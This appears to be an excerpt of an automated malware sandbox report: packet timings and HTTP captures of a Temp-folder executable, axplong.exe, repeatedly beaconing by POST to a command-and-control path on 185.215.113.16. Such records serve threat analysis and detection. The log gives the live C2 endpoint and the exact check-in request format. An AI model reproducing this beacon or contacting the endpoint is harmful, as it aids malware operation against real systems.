Jul 27, 2024 09:36:01.822201014 CEST	49772	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:01.925685883 CEST	49772	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:01.925910950 CEST	49773	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:01.930825949 CEST	80	49773	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:01.930927038 CEST	49773	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:01.931154966 CEST	80	49772	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:01.931216955 CEST	49772	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:01.932753086 CEST	49773	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:01.937572956 CEST	80	49773	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:02.698842049 CEST	80	49773	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:02.699071884 CEST	49773	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:02.736279964 CEST	49773	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:02.741925001 CEST	80	49773	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:02.988058090 CEST	80	49773	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:02.988185883 CEST	49773	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:03.097528934 CEST	49773	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:03.097799063 CEST	49774	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:03.104589939 CEST	80	49774	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:03.104634047 CEST	80	49773	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:03.104718924 CEST	49774	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:03.104758024 CEST	49773	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:03.104902983 CEST	49774	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:03.109992027 CEST	80	49774	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:03.853441000 CEST	80	49774	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:03.854269981 CEST	49774	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:03.956034899 CEST	49774	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:03.956723928 CEST	49775	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:03.961754084 CEST	80	49775	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:03.961970091 CEST	80	49774	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:03.961986065 CEST	49775	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:03.962023020 CEST	49774	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:03.962127924 CEST	49775	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:03.966984987 CEST	80	49775	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:04.722702980 CEST	80	49775	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:04.722806931 CEST	49775	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:04.833785057 CEST	49775	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:04.834635019 CEST	49776	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:04.839982033 CEST	80	49775	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:04.840024948 CEST	80	49776	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:04.840076923 CEST	49775	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:04.840110064 CEST	49776	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:04.840260029 CEST	49776	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:04.845408916 CEST	80	49776	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:05.665412903 CEST	80	49776	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:05.666081905 CEST	49776	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:05.668539047 CEST	49776	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:05.668919086 CEST	49777	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:05.674194098 CEST	80	49777	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:05.674292088 CEST	49777	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:05.674417973 CEST	49777	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:05.674839020 CEST	80	49776	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:05.675978899 CEST	49776	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:36:05.679517984 CEST	80	49777	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:06.430763960 CEST	80	49777	185.215.113.16	192.168.2.6
Jul 27, 2024 09:36:06.431768894 CEST	49777	80	192.168.2.6	185.215.113.16

HTTP Request Dependency Graph

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49720	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:02.987384081 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:03.733216047 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:03.735327005 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:03.981780052 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49721	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:04.103796005 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:04.854263067 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:04.855166912 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:05.128138065 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49722	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:05.244261026 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:06.046369076 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:06.047327042 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:06.294701099 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49723	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:06.415327072 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:07.175765991 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:07.176584959 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:07.425575018 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49724	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:07.541480064 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:08.305969000 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:08.306699991 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:08.554152012 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49725	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:08.666590929 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:09.411015987 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:09.411914110 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:09.661366940 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49726	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:09.774835110 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:10.546828032 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:10.547522068 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:10.800358057 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49728	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:10.916477919 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:11.670475006 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:11.672993898 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:11.917912960 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49729	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:12.025892973 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:13.738756895 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:13.739223003 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:13.739362001 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:13.739873886 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:13.740161896 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:14.227438927 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49730	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:14.340356112 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:15.177979946 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:15.179322004 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
